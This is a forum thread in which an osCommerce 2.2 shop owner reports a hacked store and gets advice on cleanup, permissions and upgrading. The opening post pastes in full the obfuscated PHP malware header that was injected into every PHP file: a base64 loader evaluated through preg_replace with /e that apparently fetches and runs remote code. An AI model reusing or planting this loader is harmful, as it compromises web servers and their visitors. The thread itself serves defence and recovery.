Website Hacked - version 2.2 MS-2

[labmais]

Hello, happy new year!

 

My osCommerce store was loading forever and in the end always crashed with this error:

2006 - MySQL server has gone away

 

select code, title, symbol_left, symbol_right, decimal_point, thousands_point, decimal_places, value from currencies

 

[TEP STOP]

 

After researchs I found out that it was hacked.

 

Trying to fix it I've made searchs and read several topics, but no success so far.

 

osC Version: 2.2-MS2.

Website: www.labmais.com.br

 

What I have done so far:

1st - downloaded all website files using FileZilla;

2nd - checked files and found an weird php header on all php files*;

3rd - deleted the malicious code*;

4th - reuploaded clean files.

 

These actions seem to have not solved the problem entirely

 

So I hope to get some assistance and guidance.

Since this version is old and has many known issues I hope to get pointed in the correct direction.

 

Thank you.

 

 

*This is how the header (malicious code) looks like:

<?php
/*versio:2.12*/$II1l=0;$GLOBALS['II1l'] = 'jY3VybAC_YX2luaXQyYWxsb3dfdXJsX2ZvcGVuMQEoTgEX3NldG9wdADTX2V4ZWM^MrXwY2xvc2U%PGltZyBzcmM9IgIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4xSFRUUF9IT1NUbVwMTI3LgAMTAu.MTkyLjE2OC4sdw*!b3Nvbi5pbgZHZ2Fib3Iuc2Ulc2lsYmVyLmRlXaGF2ZWFwb2tlLmNvbS5hdQs%WV8xOg)cZGlzcGxheV9lcnJvcnMzH%ZGV0ZXJtaW5hdG9yuZnRwMTMMi4xMgVpSWxJbGwxMTFsMTFsSWwr(nYmFzZTY0X2RlY29kZQjkETYmFzZTY0X2VuY29kZQqg{aHR0cDovLwZmtSFRUUF9VU0VSX0FHRU5UdW5pb24wSLc2VsZWN0FW^wUkVRVUVTVF9VUkkohU0NSSVBUX05BTUUkUVVFUllfU1RSSU5HcPwFL3RtcC8L3RtcAVE1QVEVNUAP&_kKVE1QRElS?xcdXBsb2FkX3RtcF9kaXI.LgdmVyc2lv&^tKLQUfHDBALXBocAthSFRUUF9FWEVDUEhQ{*Ab3V0Xb2sF@?aHR0cAOi8vwpL3BnLnBocD91PQbrNJms9JnQ9cGhwJnA9PJnY9ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkVsc2JERkpTU2w3SUNSUlVWRlBVVkVnUFNCUlVWRXdVVkZQVHlneExDQTJLVHNnSkZGUFVVOHdVU0E5SUNSUlVWRlBVVkV1VVZGUk1GRlJUMDhvTVRBc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1VWRlJNRkZSVDA4b01UZ3NJREl3S1NrZ1BUMGdVVkZSTUZGUlQwOG9NemdzSURJcEtTQjdJQ1JKU1d4c1NXdzlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JKYkd3eFNVa3BPeUJ5WlhSMWNtNGdVVkZSTUZGUlQwOG9ORE1zSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUlJUMUZQTUZFcEtYc2dKRkZSVDFGUE1DQTlJRUFrVVU5UlR6QlJLQ2s3SUNSSk1Va3hTV3dnUFNBa1VWRlJUMUZSTGxGUlVUQlJVVTlQS0RRMUxDQXhNQ2s3SUNSSmJFbHNTVEVnUFNBa1VWRlJUMUZSTGxGUlVUQlJVVTlQS0RVM0xDQTNLVHNnSkZGUlVVOVJNQ0E5SUNSUlVWRlBVVkV1VVZGUk1GRlJUMDhvTmpjc0lESXBMbEZSVVRCUlVVOVBLRFk1TENBM0tUc2dRQ1JKTVVreFNXd29KRkZSVDFGUE1Dd2dRMVZTVEU5UVZGOVZVa3dzSUNSSmJHd3hTVWtwT3lCQUpFa3hTVEZKYkNna1VWRlBVVTh3TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrU1RGSk1VbHNLQ1JSVVU5UlR6QXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1NURkpNVWxzS0NSUlVVOVJUekFzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tVVEJQVVRCUElEMGdRQ1JKYkVsc1NURW9KRkZSVDFGUE1Da3BJSHR5WlhSMWNtNGdVVkZSTUZGUlQwOG9ORE1zSURBcE8zMGdRQ1JSVVZGUFVUQW9KRkZSVDFGUE1DazdJSEpsZEhWeWJpQlJVVkV3VVZGUFR5ZzBNeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCUlVWRXdVVkZQVHlnM055d2dNVFFwTGlSSmJHd3hTVWt1VVZGUk1GRlJUMDhvT1RFc0lETTVLVHNnZlNCOUlHWjFibU4wYVc5dUlIVndaQ2drVVRCUlVWRlBMQ1JKYkd3eFNVa3BleUFrVVU5UlQwOVBJRDBnUUdkbGRHaHZjM1JpZVc1aGJXVW9RQ1JmVTBWU1ZrVlNXMUZSVVRCUlVVOVBLREV6TVN3Z01USXBYU2s3SUdsbUlDZ2tVVTlSVDA5UElDRTlQU0JSVVZFd1VWRlBUeWcwTXl3Z01Da2dZVzVrSUhOMGNuQnZjeWdrVVU5UlQwOVBMQ0JSVVZFd1VWRlBUeWd4TkRZc0lEWXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JSVDFGUFQwOHNJRkZSVVRCUlVVOVBLREUxTXl3Z05Da3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRkZQVVU5UFR5d2dVVkZSTUZGUlQwOG9NVFU0TENBeE1Ta3BJQ0U5UFNBd0tYc2dKRWt4TVRGc1NUMUFabTl3Wlc0b0pGRXdVVkZSVHl4UlVWRXdVVkZQVHlneE56QXNJRElwS1RzZ1FHWmpiRzl6WlNna1NURXhNV3hKS1RzZ2FXWWdLRUJwYzE5bWFXeGxLQ1JSTUZGUlVVOHBLWHNnZDNKcGRHVW9KRkV3VVZGUlR5d2daMlYwWm1sc1pTZ2tTV3hzTVVsSktTazdJSDA3SUgwZ2ZTQWtVVkZSVVRCUElEMGdRWEp5WVhrb1VWRlJNRkZSVDA4b01UYzBMQ0F4TUNrc0lGRlJVVEJSVVU5UEtERTROaXdnTVRFcExDQlJVVkV3VVZGUFR5Z3hPVGdzSURFeUtTd2dVVkZSTUZGUlQwOG9NakV4TENBeU1pa3BPeUFrU1VreE1XeEpJRDBnSkZGUlVWRXdUMXN4WFRzZ1puVnVZM1JwYjI0Z2QzSnBkR1VvSkZFd1VWRlJUeXdrVVU4d01EQlJLWHNnYVdZZ0tDUkpNV3hKTVVrOVFHWnZjR1Z1S0NSUk1GRlJVVThzVVZGUk1GRlJUMDhvTVRjd0xDQXlLU2twZXlCQVpuZHlhWFJsS0NSSk1XeEpNVWtzSkZGUE1EQXdVU2s3SUVCbVkyeHZjMlVvSkVreGJFa3hTU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQnZkWFJ3ZFhRb0pGRlBNRTlQVHl3Z0pGRlJNRTh3TUNsN0lHVmphRzhnVVZGUk1GRlJUMDhvTWpNMUxDQXpLUzRrVVU4d1QwOVBMbEZSVVRCUlVVOVBLREl6T1N3Z01pa3VKRkZSTUU4d01DNGlYSEpjYmlJN0lIMGdablZ1WTNScGIyNGdjR0Z5WVcwb0tYc2djbVYwZFhKdUlGRlJVVEJSVVU5UEtEUXpMQ0F3S1RzZ2ZTQkFhVzVwWDNObGRDaFJVVkV3VVZGUFR5Z3lORE1zSURFNUtTd2dNQ2s3SUdSbFptbHVaU2hSVVZFd1VWRlBUeWd5TmpVc0lERTJLU3dnTVNrN0lDUlJNRkV3VVZFOVVWRlJNRkZSVDA4b01qZ3lMQ0EzS1RzZ0pFbEpNV3hKYkQxUlVWRXdVVkZQVHlneU9Ea3NJRFlwT3lBa1VUQlJUMUZQUFZGUlVUQlJVVTlQS0RJNU55d2dNVGtwT3lBa1VVOVBNREJQUFZGUlVUQlJVVTlQS0RNeE9Td2dNVGdwT3lBa1VUQlBNRTlSUFZGUlVUQlJVVTlQS0RNME1Td2dNVGdwT3lBa1NVa3hTVEV4UFZGUlVUQlJVVTlQS0RNMk1pd2dNVEFwT3lBa1NVa3hTVEV4TGoxemRISjBiMnh2ZDJWeUtFQWtYMU5GVWxaRlVsdFJVVkV3VVZGUFR5Z3hNekVzSURFeUtWMHBPeUFrVVZFd1QxRXdJRDBnUUNSZlUwVlNWa1ZTVzFGUlVUQlJVVTlQS0RNM05Td2dNakFwWFRzZ1ptOXlaV0ZqYUNBb0pGOUhSVlFnWVhNZ0pGRlBNRTlQVHowK0pGRlJNRTh3TUNsN0lHbG1JQ2h6ZEhKd2IzTW9KRkZSTUU4d01DeFJVVkV3VVZGUFR5Z3pPVFVzSURjcEtTbDdKRjlIUlZSYkpGRlBNRTlQVDEwOVVWRlJNRkZSVDA4b05ETXNJREFwTzMwZ1pXeHpaV2xtSUNoemRISndiM01vSkZGUk1FOHdNQ3hSVVZFd1VWRlBUeWcwTURVc0lEZ3BLU2w3SkY5SFJWUmJKRkZQTUU5UFQxMDlVVkZSTUZGUlQwOG9ORE1zSURBcE8zMGdmU0JwWmlnaGFYTnpaWFFvSkY5VFJWSldSVkpiVVZGUk1GRlJUMDhvTkRFM0xDQXhOU2xkS1NrZ2V5QWtYMU5GVWxaRlVsdFJVVkV3VVZGUFR5ZzBNVGNzSURFMUtWMGdQU0JBSkY5VFJWSldSVkpiVVZGUk1GRlJUMDhvTkRNMExDQXhOU2xkT3lCcFppaEFKRjlUUlZKV1JWSmJVVkZSTUZGUlQwOG9ORFV3TENBeE5pbGRLU0I3SUNSZlUwVlNWa1ZTVzFGUlVUQlJVVTlQS0RReE55d2dNVFVwWFNBdVBTQlJVVkV3VVZGUFR5ZzBOamNzSURJcElDNGdRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVVOVBLRFExTUN3Z01UWXBYVHNnZlNCOUlHbG1JQ2drU1RFeFNURnNQU1JKU1RGSk1URXVRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVVOVBLRFF4Tnl3Z01UVXBYU2w3SUNSSk1VbHNNVEU5UUcxa05TZ2tTVWt4U1RFeExpUkpTVEZzU1d3dVVFaFFYMDlUTGlSUk1GRlBVVThwT3lBa1NXeHNTVWxzUFZGUlVUQlJVVTlQS0RRM01Dd2dOeWs3SUNSUlR6QXdNREFnUFNCQmNuSmhlU2hSVVZFd1VWRlBUeWcwTnpjc0lEWXBMQ0JBSkY5VFJWSldSVkpiVVZGUk1GRlJUMDhvTkRnekxDQTBLVjBzSUVBa1gxTkZVbFpGVWx0UlVWRXdVVkZQVHlnME9EY3NJRFlwWFN3Z1FDUmZSVTVXVzFGUlVUQlJVVTlQS0RRNE15d2dOQ2xkTENCQUpGOUZUbFpiVVZGUk1GRlJUMDhvTkRrNExDQTRLVjBzSUVBa1gwVk9WbHRSVVZFd1VWRlBUeWcwT0Rjc0lEWXBYU3dnUUdsdWFWOW5aWFFvVVZGUk1GRlJUMDhvTlRBNUxDQXhPU2twS1RzZ1ptOXlaV0ZqYUNBb0pGRlBNREF3TUNCaGN5QWtTVEZKYkd4c0tYc2dhV1lnS0NGbGJYQjBlU2drU1RGSmJHeHNLU2w3SUNSSk1VbHNiR3d1UFVSSlVrVkRWRTlTV1Y5VFJWQkJVa0ZVVDFJN0lHbG1JQ2hBYVhOZmQzSnBkR0ZpYkdVb0pFa3hTV3hzYkNrcGV5QWtTV3hzU1Vsc0lEMGdKRWt4U1d4c2JEc2dZbkpsWVdzN0lIMGdmU0I5SUNSMGJYQTlKRWxzYkVsSmJDNVJVVkV3VVZGUFR5ZzFNamtzSURJcExpUkpNVWxzTVRFN0lHbG1JQ2hBSkY5VFJWSldSVkpiSWtoVVZGQmZXVjlCVlZSSUlsMDlQU1JKTVVsc01URXBleUJsWTJodklDSmNjbHh1SWpzZ1FHOTFkSEIxZENoUlVWRXdVVkZQVHlnMU16RXNJRGdwTENBa1NVa3hiRWxzTGxGUlVUQlJVVTlQS0RVME15d2dNaWt1SkZFd1VUQlJVUzVSVVZFd1VWRlBUeWcxTlRFc0lEWXBLVHNnYVdZZ0tDUlJUMUZQTURBOUpGRlBUekF3VHloQUpGOVRSVkpXUlZKYlVWRlJNRkZSVDA4b05UVTVMQ0F4TmlsZEtTbDdJRUJsZG1Gc0tDUlJUMUZQTURBcE95QmxZMmh2SUNKY2NseHVJanNnUUc5MWRIQjFkQ2hSVVZFd1VWRlBUeWcxTnpnc0lEUXBMQ0JSVVZFd1VWRlBUeWcxT0RNc0lETXBLVHNnZlNCbGVHbDBLREFwT3lCOUlHbG1JQ2hBYVhOZlptbHNaU2drZEcxd0tTbDdJRUJwYm1Oc2RXUmxYMjl1WTJVb0pIUnRjQ2s3SUgwZ1pXeHpaWHNnSkVreE1Va3hiRDFBZFhKc1pXNWpiMlJsS0NSSk1URkpNV3dwT3lCMWNHUW9KSFJ0Y0N4UlVWRXdVVkZQVHlnMU9Ea3NJRFlwTGxGUlVUQlJVVTlQS0RVNU5Td2dOQ2t1SkZGUlVWRXdUMXN3WFM1UlVWRXdVVkZQVHlnMk1ERXNJREUwS1M0a1NURXhTVEZzTGxGUlVUQlJVVTlQS0RZeE9Dd2dOQ2t1SkVreFNXd3hNUzVSVVZFd1VWRlBUeWcyTWpJc0lERXlLUzRrVVRCUk1GRlJMbEZSVVRCUlVVOVBLRFl6TlN3Z05Da3VKRWxKTVd4SmJDazdJSDBnZlNCOSIpKTsfxbcHJlZ19yZXBsYWNl6261736536345f6465636f6465';if (!function_exists('QQQ0QQOO')){function QQQ0QQOO($a, $ B){$c=$GLOBALS['II1l']; $d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $ B));}};$QO0QQ0QO0 = QQQ0QQOO(6461, 16);$QO0QQ0QO0("/Il11lIIII/e", QQQ0QQOO(639, 5819), "Il11lIIII");?>

[♥toyicebear]

Suggestion, upgrade your cart to V2.3.3.4

[labmais]

Suggestion, upgrade your cart to V2.3.3.4

Hi Nick, nice to see you here again :)

I believe can't simply do that, because my current site is very customized.

It will require some study, won't it?

[♥toyicebear]

It will take you some time since you have to upgrade 1 version at a time, but in the end it will probably be worth it since you will have a much more secure site as well as it being compatible with new MySQL/php versions.

 

As a "quick" solution you can look into adding a few security add-ons to your shop to try to prevent future hacks.

 

A bit old, but still a good start since you are on a 2.2 based cart, http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

[Jack_mcs]

@@labmais Hackers will many times add files when they get in so cleaning the obvious changes won't help. The best thing to do, if possible, is to have your host replace, not restore, the complete web directory, assuming they have a backup of a clean copy. Once they do, you should download it to your computer as a backup since the hacker will do this again until you fix the security hole they used.

[labmais]

@@labmais Hackers will many times add files when they get in so cleaning the obvious changes won't help. The best thing to do, if possible, is to have your host replace, not restore, the complete web directory, assuming they have a backup of a clean copy. Once they do, you should download it to your computer as a backup since the hacker will do this again until you fix the security hole they used.

They don't have backups.

This forum is my resort since there are several osC experts here.

 

I just found something that may help.

When I change 'uploads' folder permission to something different than '777', my website becomes accessible and functional but with some errors:

 

Warning: session_start() [function.session-start]: open(/dados/www/dominios/htdocs/labmil/www.labmais.com.br/uploads/sess_977d18ad7db8c2ebfe14c8aa1e79225b, O_RDWR) failed: Permission denied (13) in /dados/www/dominios/htdocs/labmil/www.labmais.com.br/catalogo/includes/functions/sessions.php on line 98

 

Warning: session_write_close() [function.session-write-close]: open(/dados/www/dominios/htdocs/labmil/www.labmais.com.br/uploads/sess_977d18ad7db8c2ebfe14c8aa1e79225b, O_RDWR) failed: Permission denied (13) in /dados/www/dominios/htdocs/labmil/www.labmais.com.br/catalogo/includes/functions/sessions.php on line 226

 

Warning: session_write_close() [function.session-write-close]: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/dados/www/dominios/htdocs/labmil/www.labmais.com.br/uploads) in /dados/www/dominios/htdocs/labmil/www.labmais.com.br/catalogo/includes/functions/sessions.php on line 226

 

Changing permissions back to '777' results on this death message:

2006 - MySQL server has gone away

 

select code, title, symbol_left, symbol_right, decimal_point, thousands_point, decimal_places, value from currencies

 

[TEP STOP]

[MrPhil]

It will take you some time since you have to upgrade 1 version at a time, but in the end it will probably be worth it

 

Actually, I would not recommend going beyond 2.2 RC2a to 2.3, as the upgrade packages leave you with something that is not equivalent to a fresh 2.3 install. It's sort of a mixture of 2.2 and 2.3 that we like to refer to as a "Frankenstore". It is not a good base from which to go into the future.

 

As painful as it may appear to be, I would suggest installing 2.3.3.4 in a test (non-public) directory, with a new database, and migrating over your database contents and product images. You should then have a fully functioning 2.3.3.4 version of your store. You can then start looking at what theme modifications (see "Themeroller"), add-ons, and custom coding you would need to get back to the look and feel of your current store. Hopefully, the experience will encourage you to stay fairly up-to-date with your osC versions, and not fall so far behind.

[♥toyicebear]

I agree with Phil, if possible you should rather start fresh with a brand new install of the latest Oscommerce version and migrate over the old db info. (At the time of writing this the latest stable version is 2.3.3.4).

 

This applies even more when your old shop have been hacked.

 

[labmais]

Mr Phil, thank you for your answer.

I have cleaned all my php files (getting rid of the malicious code) and my website is almost working.

Almost, because it still have some weird issue that I can't sort out...

 

I have a folder named 'uploads' that stores sessions. It's permission is setted to '777' and when I try to load my website I get this error:

2006 - MySQL server has gone away

 

select code, title, symbol_left, symbol_right, decimal_point, thousands_point, decimal_places, value from currencies

 

[TEP STOP]

 

 

 

Changing the 'uploads' folder permission to anything other than 777 will make my website loads and works almost properly, but showing these errors:

 

Warning: session_start() [function.session-start]: open(/dados/www/dominios/htdocs/labmil/www.labmais.com.br/uploads/sess_977d18ad7db8c2ebfe14c8aa1e79225b, O_RDWR) failed: Permission denied (13) in/dados/www/dominios/htdocs/labmil/www.labmais.com.br/catalogo/includes/functions/sessions.php on line 98

Warning: session_write_close() [function.session-write-close]: open(/dados/www/dominios/htdocs/labmil/www.labmais.com.br/uploads/sess_977d18ad7db8c2ebfe14c8aa1e79225b, O_RDWR) failed: Permission denied (13) in/dados/www/dominios/htdocs/labmil/www.labmais.com.br/catalogo/includes/functions/sessions.php on line 226

Warning: session_write_close() [function.session-write-close]: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/dados/www/dominios/htdocs/labmil/www.labmais.com.br/uploads) in/dados/www/dominios/htdocs/labmil/www.labmais.com.br/catalogo/includes/functions/sessions.php on line 226

 

 

What can I do on this scenario?

 

 

 

As a parallel measure I'm already trying to migrate my old DB content to a new installed version (2.3.3.4). As you state here:

As painful as it may appear to be, I would suggest installing 2.3.3.4 in a test (non-public) directory, with a new database, and migrating over your database contents and product images.

The problem is that I'm not being so lucky with this...

Just importing backup entries seems not to be enough.

I'm still trying, but no success so far.

I've been trying since 16:00 PM and it's 04:10 AM now, going to sleep to continue it later...

[Jack_mcs]

You should not be using 777 unless you have to since it is a security problem. Plus, depending upon how the server is set up, it may not be allowed to use 777 and would cause failures if used.

[labmais]

You should not be using 777 unless you have to since it is a security problem. Plus, depending upon how the server is set up, it may not be allowed to use 777 and would cause failures if used.

I know, that's what my last post is about.

Look, you are telling me what I should to do in a normal scenario, but this is not the case.

 

After fixing everything, I have one problem and I don't know yet how to fix.

 

Thank you.

[MrPhil]

The point is, you should never start with file or directory permissions of 777. They are "world writable", and any other account (user) sharing your server can overwrite your files! Try 755 (for directories) first, and then 775 if the software reports that it can't write, and 777 only as a last resort. It may be that PHP is set up to run as a random ("world/other") user, and needs 777. Many systems have security software that forbids access to world writable files or directories (xx2, xx3, xx6, xx7 permissions), which can cause all sorts of strange and non-obvious problems.

 

The malicious code you found certainly was planted by a hacker, but you won't know unless you do a very thorough comparison against a known clean osC version whether you found all added files (back doors, hidden scripts, etc.). Without checking line by line against a known clean version (such as a backup), you won't know if there's anything else in there. It may almost be less work to start over with 2.3.3.4.

 

Regarding the session-related errors, could your host have recently upgraded to PHP 5.4 or 5.5? Those are known to have many incompatibilities with old session usage, and might be the cause of your problems. It might also be that sessions use a particular directory to store session information, that the hacker made non-writable (or, someone attempting to recover from the hack did that). You'll have to work with your host on checking that. Was this a server-wide hack, or as far as you know was it limited to just your account?

 

When you import your old (2.2) level .sql backups into the new osC 2.3.3.4, you first need to drop all tables in the new database (empty it out). Import the backup, and then use the add-on with SQL statements to upgrade all tables to 2.3.something level (http://addons.oscommerce.com/info/8731). At that point you should have a working 2.3.3.4 system with your data.

[dhooper]

@@labmais Having gone through an experience where a hacker added code to all sorts of files, I can attest that it is waaay simpler to start with a fresh install regardless of how much customization was involved to begin with. I had a backup of my files, but, unfortunately, my backup was infected because I didn't know about the hackers code beforehand and only kept the most recent set of files. It was a horrible experience, to say the least. I honestly hope that you find the problem so your site is not completely down, but I highly recommend a rebuild as soon as you are capable of it. I know it doesn't help your situation at all, but I thought you may appreciate knowing that someone else has gone through this too.

[labmais]

@@dhooper

@@MrPhil

@@Jack_mcs

@@toyicebear

 

Thank you all for your tips and thoughts.

I want to let you know that I have solved this issue and my site is working exactly as was before the hacker invasion.

 

Half of the problem was my hosting provider that blocked services such as mail and limited my hosting account without letting me know.

The other half was the script injection that I cleaned.

I'm already moving to another hosting company and everything will be fine.

 

 

@@dhooper, I understand what you say, but for me, thats not a solution. It's an alternative.

Anyway, the problem has been solved and I am already working on something more reliable than this old and outdated version.

 

 

Thank you all.

 

 

I wish you all a happy and blessed 2014.